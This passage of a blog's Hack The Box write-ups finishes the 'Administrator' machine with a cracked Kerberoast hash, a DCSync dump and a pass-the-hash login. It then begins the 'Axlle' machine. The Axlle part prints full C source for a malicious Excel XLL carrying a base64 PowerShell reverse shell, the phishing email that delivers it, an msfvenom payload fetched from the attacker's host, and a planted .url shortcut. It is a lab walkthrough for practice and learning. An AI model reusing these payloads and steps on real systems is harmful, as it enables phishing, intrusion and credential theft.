class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt hashcat (v6.2.6) starting &lt;...snip...> Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$9f83d419ead644eaf77e344cdfc3a3fb$39e5bdd9d85a3a3870ee7f6ff9faa916480b2615f69c36812cb2342d211db199bdc9ee45665c7a075af20eee935826a03e4a38e609007dbc4b0d7244512f79a73708160eb65a4ea67e823cff2875a6c36cb59b64daf687dcb5ab522520e8d2144ded21723b08897239135a3bf1713144d3867a1a828e35d0025e09f84acd5516f43b48578c98d7e7c2a39bd40b02d4106c0c356fac178d71bd833d3e6514451762b764976887f7371f9b5e63a9cf42ab2aa16975f9ad361559df6a03b9c2da86795455fd83680b977e411c1292669566f0beb6b13b5d9414c96ad4806183724698d9f784134545d5a179f10646188e9474bc6331a4b1209b3312ab95c54209f183026ebc0358cd032826f973e015844a34c4f40847d9fd2d126d3be99cfe1b24bc75e9e262087a4aa5752ad274d90406cb649721e9c2c4a2a40f0fef2548329fef12c867b984621f7f9b401b77036fb4b6bcb39fc215472c62e1a0c8433ac111f407af12ee951366ed11a247e2d4ff85eb4c235909a39d1719e4a7c4ef5f081c74cace8418432fb6825f5d94eceaff8259e79105dc6913bebfb117e11b09e3ecedbe557da245e494478c16efb4c1f62cf1aa57b91f8cfa6e6e2dc96fa08dd9b7dd1dc7cc26f5c6097f9ffc0438047d67576607e9d49613ddc943773bebfaf3945f7e9a082239a2558994b223dc99e73ed35a066a8c63113d99b38f7efc4d991a33d71f3ef2a2485853e59e4284580cf0a52d93e4a36ef209fdc9aea95416dbf2f604a2b771a86b73a8d6ea226c509583d4c0d043c32f76e7abfe19846be9ed24a2bf6bf084e7732564030f4d1560a87d3c3e14b0f9843d3fc6c2f00209e9289460d735efb06d192d28c2df2da38cf9797d358a7ac39a314f84df1e1a67f4aa4416ebbb99bd79f23fd97d5e31bac902d3a2ce880aa6341cb5999fadbecbca7594b39c2c76f6602fb65670e60d44e7085436dfd15c2cfdb2fa9ace3c317c20c2980a9b5422c549519207ca2c64f05629f0962b8f4d1c24b7078ccc13f75590884b96689fca1b12bae6e145d9504c008c697562f0b86915425ca16a25dbc394df67f601285249bd521dd04a1f8b8aa32cc0748c6259e271b70914aa0e5a458a08b4cbe1569e31a04a1fce0a9e058b77b58866f7914cd78200ec0b45d5c699ed5ea8df52759a750b7b238e7898e079f0d43c8073f55e64d3294f57de648fb44a8d42b8d4280fc09edb2fa3cde129b8181e56c6b549257a90232b111fd11bf4bd34a07e0ec5e54b128e7c69a097b100248000d0ca2cb7bfd6d72b03a9e3ee1fc786afb238a7e1db38280232b1cbd1197b38fa144daa7370b03f97b9268409899fc1ca21bf72d34a2c21551522bb494fbfeadf2d72666a0d5690cf1d3027339c71d484d0cd821f983a6adedd8b87568a5195bf74ea93c9ee55b5605ceabee0db8ee38d7e39774c2e2dd8ce6224c2abc63284e2bfc33d65d668934098062b175c6703f2befc1eba7ccaab2e1e1b02c7bd4aa8b01e8d41852e4165b5168ff697228e32:limpbizkit Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) &lt;...snip...></code></pre></div> <p>With the credentials of the <code class="language-text">ethan</code> account, I used <code class="language-text">impacket-secretsdump</code> to run the DCSync attack and obtain the NTLM hash of the <code class="language-text">administrator</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ impacket-secretsdump ethan@10.10.11.42 -just-dc-user administrator Impacket v0.11.0 - Copyright 2023 Fortra Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664 Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2 Administrator:des-cbc-md5:403286f7cdf18385 [*] Cleaning up... </code></pre></div> <p>Then, with the hash of the <code class="language-text">administrator</code>, I was able to log in over WinRM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Administrator] └─$ evil-winrm -i 10.10.11.42 -u 'administrator' -H 3dc553ce4b9fd20bd016e098d2d2fd2e Evil-WinRM shell v3.5 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami administrator\administrator *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop *Evil-WinRM* PS C:\Users\Administrator\desktop> ls Directory: C:\Users\Administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 1/2/2025 9:04 AM 34 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-axlle/https://mgarrity.com/hack-the-box-axlle/Mon, 16 Dec 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ba1e4f1a0aa8a53c92a9040e292e9163/3b67f/axlle.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABBklEQVR42mMQkdX+jwuLArGQnM5/PkX9/0LyOmC+CAHMgM8wXnnd/+LCiv81OMXBNIgvSo6BIE38QM2mQnL/u1y9/69rav0/wcPnvzGQz0fAUKwGCivo/RcDumgG0JATv/7/33Nh6f8T57f/n+If+V9EUO6/CNBQog0Eu07R4L8al9j/LdU1/y/8////+rL8/3v3zP+/tr7tvya3+H9+BX2crsTuQqALJMVV/lcbmf+ftnHN/+V71v2f3lX6v0NH87+ohMZ/EWBEkeRlMWiEgMKszMjsf3N83P8qA8P/RuSGIczrIM2SYir/dfhlgS5TI2gYXgMhLtUCR4AAMJJEgd4UIyIdAgAraA4smH04jgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Axlle" title="" src="/static/ba1e4f1a0aa8a53c92a9040e292e9163/50637/axlle.png" srcset="/static/ba1e4f1a0aa8a53c92a9040e292e9163/dda05/axlle.png 158w, /static/ba1e4f1a0aa8a53c92a9040e292e9163/679a3/axlle.png 315w, /static/ba1e4f1a0aa8a53c92a9040e292e9163/50637/axlle.png 630w, /static/ba1e4f1a0aa8a53c92a9040e292e9163/fddb0/axlle.png 945w, /static/ba1e4f1a0aa8a53c92a9040e292e9163/3b67f/axlle.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Axlle is a Windows machine running Active Directory. A hosted website displays a maintenance notice, but also mentions that outstanding invoices or requests can be sent via email in Excel format. This can be exploited for a phishing attack using a malicious XLL, leading to a shell as <code class="language-text">gideon.hamill</code>. A malicious <code class="language-text">.url</code> can then be dropped into the <code class="language-text">C:\inetpub\testing</code> folder, which is executed by <code class="language-text">dallon.matrix</code>, resulting in another shell. The plaintext password for this user can be found in their PowerShell console history which can be used to collect domain data for BloodHound. Enumeration with BloodHound reveals that <code class="language-text">dallon.matrix</code> has the ForceChangePassword privilege on two users. The password for either of these users can be changed and then used to log in over WinRM. This access can be leveraged to exploit the automated execution of <code class="language-text">standalonerunner.exe</code> as <code class="language-text">SYSTEM</code>, resulting in a shell as <code class="language-text">administrator</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ nmap -sC -sV -oA nmap/output 10.10.11.21 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 07:41 EST Nmap scan report for 10.10.11.21 Host is up (0.050s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 25/tcp open smtp hMailServer smtpd | smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Axlle Development |_http-server-header: Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-12 12:41:40Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2024-12-12T12:41:53 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 61.32 seconds</code></pre></div> <p>I added <code class="language-text">axlle.htb</code> and <code class="language-text">mainframe.axlle.htb</code> to <code class="language-text">/etc/hosts</code>, then I visited the webpage on port 80:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e92a378ebddd300d967bbe0ae8a04474/bcb16/axlle-development-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 73.41772151898735%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACR0lEQVR42q1RWUsyUBC9LS5lmYIhQfgQJCKo5JtIkAo9tROSZIIbiJqppEVWtJeZLSr93RNn4IrER0/fw+HemTtzzpm56vPzE71eT/D19SXodDpot9t4e3tDt9uV8/X1FY+Pj3h4eMDLy4vUf39/o9/vYzAY4OPjQ/KKzSxm8PT0JE13d3e4vb2V+/Pzs5CMgnn2vL+/DwW1CcWA7AzYTNLfBPf398OT77pGOx4VUhsbG0ilUri6upIEi7VbCoyOSUd0f3NzIwb0mxYk1NraGkiayWTQaDRQr9dRKpXk8fr6Wkg5fqVSQTKZRDQaxc7Ojpi4uLjA5eWl1FGEUFNTU1heXsbBwQHOz8+FsFqtyhpIxJWQNJ/Pw+/3IxQKIZvNIpFIoFwuSy17isUidnd3oebm5jA9PQ2v14ujoyNxd3p6imaziVqtJmi1WuKEE9Ap13N2diZEx8fH4nx1dRV2ux3K4XBgfn5eXEYiEaTTaVErFArI5XJyMibRycmJOCIYU5xuw+EwFhYWMDMzA2U0GmEwGGC1WuHxeBCLxbC1tYW9vT3E43EZ7fDwcAhOQUf7+/tSu7S0hNnZWUxMTAiP0hfaXVxcFFIqrq+vY3NzE9vb2wLuh5/BD+R4Pp9P6rky/oM2piYnJ+VisVhkdJfLBbfbLQ2BQAArKysIBoNyMuZqWEMyp9MphGazWTiGhJpUq2gwpjo/jYJci81mE/DOnMlkklrNIyMT4+Pjf0LXaSESkUDnNZRuGBsbE/yO/5X7S1iNNv4P/AD/DiLcEAnDuwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Axlle Development webpage" title="" src="/static/e92a378ebddd300d967bbe0ae8a04474/50637/axlle-development-webpage.png" srcset="/static/e92a378ebddd300d967bbe0ae8a04474/dda05/axlle-development-webpage.png 158w, /static/e92a378ebddd300d967bbe0ae8a04474/679a3/axlle-development-webpage.png 315w, /static/e92a378ebddd300d967bbe0ae8a04474/50637/axlle-development-webpage.png 630w, /static/e92a378ebddd300d967bbe0ae8a04474/fddb0/axlle-development-webpage.png 945w, /static/e92a378ebddd300d967bbe0ae8a04474/bcb16/axlle-development-webpage.png 1002w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There was the following message on the site:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7c107c63f607f0fe34090edda63035ec/6f406/website-maintenance-message.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABXElEQVR42nVS266CQAzcoOCFiKhcVVBAXlBf/P9/m8M0Z5KNOedh0t1tO22n68IwhLBYLAxBEBh099//8vscbrVagdhsNqiqCofDAXme2znLMiRJgv1+jzRN7X48Hs1P6B5FEcTj1us1CBJer1c0TYO+7/F4PPB8PjFNE16vF97vNz6fD8ZxRNd1Zhl7uVyMSDxuu92C4IWV/NHrusYwDGjb1orcbjfriOMul0uLJ9iMeFwcxyAYyBE0SlmW9kYJCI58Op3MT58/Nn3icbvdDkLya6WjX0BngSR+ruAoOpHNQcVcmciLwlB4EJHO7JLQ8qyhmcexUjpvkYH1LHLdzkJ3dzRDj+Z+N+G5LIpPq8VRXxLSsoB+gvM1otW3YGUmsJDGVbd8p57KUy7hSCBw3PP5bGTqQB1xw+xSPlrGspDP4SQ4warfkE4qoN8gv59POH9z/gK+l/FfzLf/B5KfI43GG00UAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="website maintenance message" title="" src="/static/7c107c63f607f0fe34090edda63035ec/50637/website-maintenance-message.png" srcset="/static/7c107c63f607f0fe34090edda63035ec/dda05/website-maintenance-message.png 158w, /static/7c107c63f607f0fe34090edda63035ec/679a3/website-maintenance-message.png 315w, /static/7c107c63f607f0fe34090edda63035ec/50637/website-maintenance-message.png 630w, /static/7c107c63f607f0fe34090edda63035ec/6f406/website-maintenance-message.png 710w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">accounts@axlles.htb</code> could be used for a phishing attempt, but since macros were disabled, an alternative method was needed to get code execution. A web search led to <a href="https://github.com/Octoberfest7/XLL_Phishing" target="_blank">this</a> GitHub repo which mentions that an XLL—a specialized type of DLL designed to extend Excel's functionality—could be used for exploitation. Further searching led to <a href="https://swisskyrepo.github.io/InternalAllTheThings/" target="_blank">Internal All The Things</a> which provides <a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec" target="_blank">this</a> payload that uses <code class="language-text">xlAutoOpen()</code> to run code automatically when the file is opened.</p> <p>So I changed the payload to contain the PowerShell #3 (Base64) command from <a href="https://www.revshells.com/">revshells</a> within <code class="language-text">WinExec()</code>:</p> <div class="gatsby-highlight" data-language="c"><pre class="language-c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;windows.h></span></span> <span class="token function">__declspec</span><span class="token punctuation">(</span>dllexport<span class="token punctuation">)</span> <span class="token keyword">void</span> __cdecl <span class="token function">xlAutoOpen</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">void</span> __cdecl <span class="token function">xlAutoOpen</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token comment">// Triggers when Excel opens</span> <span class="token function">WinExec</span><span class="token punctuation">(</span><span class="token string">"powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span> BOOL APIENTRY <span class="token function">DllMain</span><span class="token punctuation">(</span> HMODULE hModule<span class="token punctuation">,</span> DWORD ul_reason_for_call<span class="token punctuation">,</span> LPVOID lpReserved <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">switch</span> <span class="token punctuation">(</span>ul_reason_for_call<span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">case</span> DLL_PROCESS_ATTACH<span class="token operator">:</span> <span class="token keyword">case</span> DLL_THREAD_ATTACH<span class="token operator">:</span> <span class="token keyword">case</span> DLL_THREAD_DETACH<span class="token operator">:</span> <span class="token keyword">case</span> DLL_PROCESS_DETACH<span class="token operator">:</span> <span class="token keyword">break</span><span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token keyword">return</span> TRUE<span class="token punctuation">;</span> <span class="token punctuation">}</span></code></pre></div> <p>I used <code class="language-text">x86_64-w64-mingw32-gcc</code> to compile the payload into an XLL:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ x86_64-w64-mingw32-gcc test.c -shared -o invoice.xll</code></pre></div> <p>Then, I started a <code class="language-text">nc</code> listener and sent an email with <code class="language-text">invoice.xll</code> attached:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ swaks -s axlle.htb --from test@axlle.htb --to accounts@axlle.htb --header "Subject: Outstanding Invoice" --body "Hello, an overdue invoice is attached." --attach @invoice.xll === Trying axlle.htb:25... === Connected to axlle.htb. &lt;- 220 MAINFRAME ESMTP -> EHLO kali &lt;- 250-MAINFRAME &lt;- 250-SIZE 20480000 &lt;- 250-AUTH LOGIN &lt;- 250 HELP -> MAIL FROM:&lt;test@axlle.htb> &lt;- 250 OK -> RCPT TO:&lt;accounts@axlle.htb> &lt;- 250 OK -> DATA &lt;- 354 OK, send. -> Date: Thu, 12 Dec 2024 12:50:02 -0500 -> To: accounts@axlle.htb -> From: test@axlle.htb -> Subject: Outstanding Invoice -> Message-Id: &lt;20241212125002.157711@kali> -> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/ -> MIME-Version: 1.0 -> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_157711" -> -> ------=_MIME_BOUNDARY_000_157711 -> Content-Type: text/plain -> -> Hello, an overdue invoice is attached. -> ------=_MIME_BOUNDARY_000_157711 -> Content-Type: application/octet-stream; name="invoice.xll" -> Content-Description: invoice.xll -> Content-Disposition: attachment; filename="invoice.xll" -> Content-Transfer-Encoding: BASE64 -> -> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -> AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v -> ZGUuDQ0KJAAAAAAAAABQRQAAZIYUACAiW2cABgEAmwMAAPAAJiALAgIpABQAAAAyAAAAAgAAIBMA -> AAAQAAAAAJ/+AQAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAAAAAgAABgAA3cMBAAMAYAEAACAA -> AAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAIAAAEkAAAAAkAAAiAMAAAAAAAAA &lt;...snip...> -> -> ------=_MIME_BOUNDARY_000_157711-- -> -> -> . &lt;- 250 Queued (10.875 seconds) -> QUIT &lt;- 221 goodbye === Connection closed with remote host.</code></pre></div> <p>Soon after that, <code class="language-text">nc</code> caught a shell as <code class="language-text">gideon.hamill</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.35] from (UNKNOWN) [10.10.11.21] 58042 PS C:\> whoami axlle\gideon.hamill</code></pre></div> <p><code class="language-text">C:\App Development</code> looked interesting as it was non-default, but the <code class="language-text">gideon.hamill</code> user didn't have access to it:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\> ls Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 1/1/2024 10:03 PM App Development d----- 1/1/2024 6:33 AM inetpub d----- 5/8/2021 1:20 AM PerfLogs d-r--- 6/13/2024 2:20 AM Program Files d----- 6/13/2024 2:23 AM Program Files (x86) d-r--- 1/1/2024 4:15 AM Users d----- 6/13/2024 4:30 AM Windows</code></pre></div> <p>After further enumeration, I found the email server at <code class="language-text">C:\Program Files (x86)\hMailServer</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Program Files (x86)> ls Directory: C:\Program Files (x86) Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/31/2023 9:50 PM Common Files d----- 1/1/2024 3:33 AM hMailServer d----- 6/12/2024 11:11 PM Internet Explorer d----- 6/13/2024 2:27 AM Microsoft d----- 1/1/2024 3:33 AM Microsoft SQL Server Compact Edition d----- 1/1/2024 3:33 AM Microsoft Synchronization Services d----- 6/13/2024 1:35 AM Microsoft.NET d----- 6/13/2024 1:46 AM MSBuild d----- 1/1/2024 3:32 AM Reference Assemblies d----- 5/8/2021 2:35 AM Windows Defender d----- 12/31/2023 9:56 PM Windows Kits d----- 6/12/2024 11:11 PM Windows Mail d----- 6/12/2024 11:11 PM Windows Media Player d----- 5/8/2021 2:35 AM Windows NT d----- 3/2/2022 7:58 PM Windows Photo Viewer d----- 5/8/2021 1:34 AM WindowsPowerShell</code></pre></div> <p>The following email in <code class="language-text">Data\axlle.htb\dallon.matrix\2F</code>, discusses testing the automation of web shortcuts:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F> cat "{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml" Return-Path: webdevs@axlle.htb Received: from bumbag (Unknown [192.168.77.153]) by MAINFRAME with ESMTP ; Mon, 1 Jan 2024 06:32:24 -0800 Date: Tue, 02 Jan 2024 01:32:23 +1100 To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb From: webdevs@axlle.htb Subject: OSINT Application Testing Message-Id: &lt;20240102013223.019081@bumbag> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/ Hi everyone, The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal. We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation. Yours in click-worthy URLs, The Web Dev Team</code></pre></div> <p>Since members of the <code class="language-text">Web Dev</code> group were testing web shortcuts in the <code class="language-text">C:\inetpub\testing</code> folder, I could place a malicious <code class="language-text">.url</code> there to obtain a shell as the user executing it. So first, I generated shell code with <code class="language-text">msfvenom</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.35 LPORT=443 -f exe -o shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: shell.exe</code></pre></div> <p>Next, I downloaded the payload onto the target in <code class="language-text">C:\programdata</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> wget 10.10.14.35:8000/shell.exe -o shell.exe PS C:\programdata> ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 6/13/2024 1:38 AM Microsoft d----- 6/13/2024 1:27 AM Package Cache d----- 12/31/2023 10:02 PM Packages d----- 6/13/2024 1:46 AM regid.1991-06.com.microsoft d----- 5/8/2021 1:20 AM SoftwareDistribution d----- 5/8/2021 2:36 AM ssh d----- 12/31/2023 9:38 PM USOPrivate d----- 5/8/2021 1:20 AM USOShared d----- 1/22/2023 1:36 AM VMware -a---- 12/12/2024 10:18 AM 7168 shell.exe</code></pre></div> <p>I started a <code class="language-text">nc</code> listener and then created the web shortcut in <code class="language-text">C:\inetpub\testing</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\inetpub\testing> echo "[internetshortcut]`nurl=c:\programdata\shell.exe" > test.url</code></pre></div> <p>Soon after creating <code class="language-text">test.url</code>, <code class="language-text">nc</code> caught a shell as <code class="language-text">dallon.matrix</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.35] from (UNKNOWN) [10.10.11.21] 52498 Microsoft Windows [Version 10.0.20348.2527] (c) Microsoft Corporation. All rights reserved. C:\>whoami whoami axlle\dallon.matrix C:\>cd \users\dallon.matrix\desktop cd \users\dallon.matrix\desktop C:\Users\dallon.matrix\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is BFF7-F940 Directory of C:\Users\dallon.matrix\Desktop 01/01/2024 03:45 AM &lt;DIR> . 01/01/2024 03:44 AM &lt;DIR> .. 12/12/2024 08:59 AM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 2,988,097,536 bytes free</code></pre></div> <p><code class="language-text">dallon.matrix</code> also couldn't access <code class="language-text">C:\App Development</code>. So next, I checked the user's console history which revealed a plaintext password:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">C:\Users\dallon.matrix\Desktop>type C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt type C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt $SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);</code></pre></div> <p>With credentials, I could use <code class="language-text">bloodhound-python</code> to collect domain data:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Axlle/bloodhound-data] └─$ bloodhound-python -u 